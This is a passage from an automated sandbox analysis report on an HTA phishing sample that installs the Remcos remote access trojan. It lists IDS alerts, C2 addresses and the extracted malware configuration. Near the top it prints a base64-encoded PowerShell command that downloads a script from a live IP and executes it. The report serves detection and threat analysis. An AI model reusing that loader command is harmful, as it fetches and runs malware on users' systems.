DZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline", ProcessId: 6080, ProcessName: csc.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Registry Key setAuthor: Joe Security: Data: Details: 18 D2 20 8F 72 BB 7F AA 92 CC 13 EA 0B 58 F9 C8 7C F6 59 6F 27 61 0F B1 A6 00 B9 F3 65 FD 9A F2 40 2B 5B 4F 9B 68 69 B6 12 A7 75 F4 91 E9 3E A7 F9 4D 40 93 02 0E 84 5C 32 C8 76 92 E3 AC 4B 26 7A CF E1 02 EC D6 1B 52 85 9C 80 F1 2A B1 2C 8C 3E 1F 34 A8 77 57 00 4D E8 57 F2 D9 76 75 25 EC C6 C9 F5 B8 F1 F1 80 D1 0E 05 4D 29 77 88 D7 96 3D 66 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 6284, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-PVMSPM\exepath
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-13T07:38:54.029867+010020204251Exploit Kit Activity Detected104.21.84.67443192.168.2.649771TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-13T07:38:54.029867+010020204241Exploit Kit Activity Detected104.21.84.67443192.168.2.649771TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-13T07:38:57.484695+010020365941Malware Command and Control Activity Detected192.168.2.649778107.173.143.1014646TCP
                    2024-12-13T07:39:00.557990+010020365941Malware Command and Control Activity Detected192.168.2.649788107.173.143.1014646TCP
                    2024-12-13T07:39:03.635150+010020365941Malware Command and Control Activity Detected192.168.2.649794107.173.143.1014646TCP
                    2024-12-13T07:39:06.714457+010020365941Malware Command and Control Activity Detected192.168.2.649801107.173.143.1014646TCP
                    2024-12-13T07:39:09.795351+010020365941Malware Command and Control Activity Detected192.168.2.649810107.173.143.1014646TCP
                    2024-12-13T07:39:12.870517+010020365941Malware Command and Control Activity Detected192.168.2.649818107.173.143.1014646TCP
                    2024-12-13T07:39:15.949037+010020365941Malware Command and Control Activity Detected192.168.2.649827107.173.143.1014646TCP
                    2024-12-13T07:39:19.026891+010020365941Malware Command and Control Activity Detected192.168.2.649836107.173.143.1014646TCP
                    2024-12-13T07:39:22.129857+010020365941Malware Command and Control Activity Detected192.168.2.649843107.173.143.1014646TCP
                    2024-12-13T07:39:25.217756+010020365941Malware Command and Control Activity Detected192.168.2.649851107.173.143.1014646TCP
                    2024-12-13T07:39:28.292064+010020365941Malware Command and Control Activity Detected192.168.2.649860107.173.143.1014646TCP
                    2024-12-13T07:39:31.369970+010020365941Malware Command and Control Activity Detected192.168.2.649869107.173.143.1014646TCP
                    2024-12-13T07:39:34.452551+010020365941Malware Command and Control Activity Detected192.168.2.649876107.173.143.1014646TCP
                    2024-12-13T07:39:37.526346+010020365941Malware Command and Control Activity Detected192.168.2.649885107.173.143.1014646TCP
                    2024-12-13T07:39:40.604671+010020365941Malware Command and Control Activity Detected192.168.2.649892107.173.143.1014646TCP
                    2024-12-13T07:39:43.699447+010020365941Malware Command and Control Activity Detected192.168.2.649900107.173.143.1014646TCP
                    2024-12-13T07:39:46.780365+010020365941Malware Command and Control Activity Detected192.168.2.649909107.173.143.1014646TCP
                    2024-12-13T07:39:49.855713+010020365941Malware Command and Control Activity Detected192.168.2.649917107.173.143.1014646TCP
                    2024-12-13T07:39:52.952850+010020365941Malware Command and Control Activity Detected192.168.2.649925107.173.143.1014646TCP
                    2024-12-13T07:39:56.046189+010020365941Malware Command and Control Activity Detected192.168.2.649934107.173.143.1014646TCP
                    2024-12-13T07:39:59.468403+010020365941Malware Command and Control Activity Detected192.168.2.649943107.173.143.1014646TCP
                    2024-12-13T07:40:02.593669+010020365941Malware Command and Control Activity Detected192.168.2.649951107.173.143.1014646TCP
                    2024-12-13T07:40:05.693031+010020365941Malware Command and Control Activity Detected192.168.2.649958107.173.143.1014646TCP
                    2024-12-13T07:40:08.796633+010020365941Malware Command and Control Activity Detected192.168.2.649966107.173.143.1014646TCP
                    2024-12-13T07:40:11.872217+010020365941Malware Command and Control Activity Detected192.168.2.649974107.173.143.1014646TCP
                    2024-12-13T07:40:14.964552+010020365941Malware Command and Control Activity Detected192.168.2.649983107.173.143.1014646TCP
                    2024-12-13T07:40:18.199825+010020365941Malware Command and Control Activity Detected192.168.2.649990107.173.143.1014646TCP
                    2024-12-13T07:40:21.277536+010020365941Malware Command and Control Activity Detected192.168.2.649998107.173.143.1014646TCP
                    2024-12-13T07:40:24.355592+010020365941Malware Command and Control Activity Detected192.168.2.650006107.173.143.1014646TCP
                    2024-12-13T07:40:27.434885+010020365941Malware Command and Control Activity Detected192.168.2.650015107.173.143.1014646TCP
                    2024-12-13T07:40:30.512640+010020365941Malware Command and Control Activity Detected192.168.2.650018107.173.143.1014646TCP
                    2024-12-13T07:40:33.691995+010020365941Malware Command and Control Activity Detected192.168.2.650019107.173.143.1014646TCP
                    2024-12-13T07:40:36.765951+010020365941Malware Command and Control Activity Detected192.168.2.650020107.173.143.1014646TCP
                    2024-12-13T07:40:39.817468+010020365941Malware Command and Control Activity Detected192.168.2.650021107.173.143.1014646TCP
                    2024-12-13T07:40:42.824567+010020365941Malware Command and Control Activity Detected192.168.2.650022107.173.143.1014646TCP
                    2024-12-13T07:40:45.793353+010020365941Malware Command and Control Activity Detected192.168.2.650023107.173.143.1014646TCP
                    2024-12-13T07:40:48.750424+010020365941Malware Command and Control Activity Detected192.168.2.650024107.173.143.1014646TCP
                    2024-12-13T07:40:51.668613+010020365941Malware Command and Control Activity Detected192.168.2.650025107.173.143.1014646TCP
                    2024-12-13T07:40:54.585616+010020365941Malware Command and Control Activity Detected192.168.2.650026107.173.143.1014646TCP
                    2024-12-13T07:40:57.449727+010020365941Malware Command and Control Activity Detected192.168.2.650027107.173.143.1014646TCP
                    2024-12-13T07:41:00.590897+010020365941Malware Command and Control Activity Detected192.168.2.650028107.173.143.1014646TCP
                    2024-12-13T07:41:03.405549+010020365941Malware Command and Control Activity Detected192.168.2.650029107.173.143.1014646TCP
                    2024-12-13T07:41:06.220764+010020365941Malware Command and Control Activity Detected192.168.2.650030107.173.143.1014646TCP
                    2024-12-13T07:41:09.028196+010020365941Malware Command and Control Activity Detected192.168.2.650032107.173.143.1014646TCP
                    2024-12-13T07:41:11.763701+010020365941Malware Command and Control Activity Detected192.168.2.650033107.173.143.1014646TCP
                    2024-12-13T07:41:14.501227+010020365941Malware Command and Control Activity Detected192.168.2.650034107.173.143.1014646TCP
                    2024-12-13T07:41:17.204841+010020365941Malware Command and Control Activity Detected192.168.2.650035107.173.143.1014646TCP
                    2024-12-13T07:41:19.876654+010020365941Malware Command and Control Activity Detected192.168.2.650036107.173.143.1014646TCP
                    2024-12-13T07:41:22.528370+010020365941Malware Command and Control Activity Detected192.168.2.650037107.173.143.1014646TCP
                    2024-12-13T07:41:25.173375+010020365941Malware Command and Control Activity Detected192.168.2.650038107.173.143.1014646TCP
                    2024-12-13T07:41:27.798618+010020365941Malware Command and Control Activity Detected192.168.2.650039107.173.143.1014646TCP
                    2024-12-13T07:41:30.449599+010020365941Malware Command and Control Activity Detected192.168.2.650040107.173.143.1014646TCP
                    2024-12-13T07:41:33.032754+010020365941Malware Command and Control Activity Detected192.168.2.650041107.173.143.1014646TCP
                    2024-12-13T07:41:35.613608+010020365941Malware Command and Control Activity Detected192.168.2.650042107.173.143.1014646TCP
                    2024-12-13T07:41:38.138463+010020365941Malware Command and Control Activity Detected192.168.2.650043107.173.143.1014646TCP
                    2024-12-13T07:41:40.676629+010020365941Malware Command and Control Activity Detected192.168.2.650044107.173.143.1014646TCP
                    2024-12-13T07:41:43.185847+010020365941Malware Command and Control Activity Detected192.168.2.650045107.173.143.1014646TCP
                    2024-12-13T07:41:45.707695+010020365941Malware Command and Control Activity Detected192.168.2.650046107.173.143.1014646TCP
                    2024-12-13T07:41:48.217483+010020365941Malware Command and Control Activity Detected192.168.2.650047107.173.143.1014646TCP
                    2024-12-13T07:41:50.687440+010020365941Malware Command and Control Activity Detected192.168.2.650048107.173.143.1014646TCP
                    2024-12-13T07:41:53.138305+010020365941Malware Command and Control Activity Detected192.168.2.650049107.173.143.1014646TCP
                    2024-12-13T07:41:55.591617+010020365941Malware Command and Control Activity Detected192.168.2.650050107.173.143.1014646TCP
                    2024-12-13T07:41:58.057647+010020365941Malware Command and Control Activity Detected192.168.2.650051107.173.143.1014646TCP
                    2024-12-13T07:42:00.828623+010020365941Malware Command and Control Activity Detected192.168.2.650052107.173.143.1014646TCP
                    2024-12-13T07:42:03.248163+010020365941Malware Command and Control Activity Detected192.168.2.650053107.173.143.1014646TCP
                    2024-12-13T07:42:05.655495+010020365941Malware Command and Control Activity Detected192.168.2.650054107.173.143.1014646TCP
                    2024-12-13T07:42:08.045202+010020365941Malware Command and Control Activity Detected192.168.2.650055107.173.143.1014646TCP
                    2024-12-13T07:42:10.421554+010020365941Malware Command and Control Activity Detected192.168.2.650057107.173.143.1014646TCP
                    2024-12-13T07:42:12.828519+010020365941Malware Command and Control Activity Detected192.168.2.650058107.173.143.1014646TCP
                    2024-12-13T07:42:15.191736+010020365941Malware Command and Control Activity Detected192.168.2.650059107.173.143.1014646TCP
                    2024-12-13T07:42:17.546059+010020365941Malware Command and Control Activity Detected192.168.2.650060107.173.143.1014646TCP
                    2024-12-13T07:42:19.874365+010020365941Malware Command and Control Activity Detected192.168.2.650061107.173.143.1014646TCP
                    2024-12-13T07:42:22.311362+010020365941Malware Command and Control Activity Detected192.168.2.650062107.173.143.1014646TCP
                    2024-12-13T07:42:24.639244+010020365941Malware Command and Control Activity Detected192.168.2.650063107.173.143.1014646TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-13T07:38:36.827575+010020490381A Network Trojan was detected151.101.1.137443192.168.2.649715TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-13T07:38:54.999503+010028582951A Network Trojan was detected104.21.84.67443192.168.2.649771TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-13T07:38:26.393804+010028587951A Network Trojan was detected192.168.2.649708192.210.150.2480TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-13T07:38:53.629074+010028410751Malware Command and Control Activity Detected192.168.2.649771104.21.84.67443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["newglobalfucntioninside.duckdns.org:14646:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-PVMSPM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                    Source: creamkissingthingswithcreambananapackagecreamy.htaVirustotal: Detection: 40%Perma Link
                    Source: creamkissingthingswithcreambananapackagecreamy.htaReversingLabs: Detection: 23%
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.4561290928.0000000001068000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6284, type: MEMORYSTR
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_0043294A
                    Source: powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_001de1c2-4

                    Exploits

                    barindex
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6284, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406764 _wcslen,CoGetObject,12_2_00406764

                    Phishing

                    barindex
                    Source: Yara matchFile source: creamkissingthingswithcreambananapackagecreamy.hta, type: SAMPLE
                    Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.6:49715 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49771 version: TLS 1.2
                    Source: Binary string: iviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2515686581.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2518375278.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: q:C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.pdb source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2515686581.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2518375278.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2518375278.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B43F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044D5F9 FindFirstFileExA,12_2_0044D5F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C79
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06

                    Software Vulnerabilities

                    barindex
                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.6:49708 -> 192.210.150.24:80
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49788 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49778 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49794 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49801 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49810 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49818 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49843 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49827 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49851 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49860 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49885 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49876 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49909 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49917 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49869 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49892 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49934 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49943 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49951 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49998 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50015 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49983 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50029 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50033 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50022 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50032 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50047 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50039 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50030 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50034 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50044 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50049 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50035 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50036 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50048 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49900 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50042 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50019 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49966 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50053 -> 107.173.143.10:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50006 -> 107.173.143.10:14646
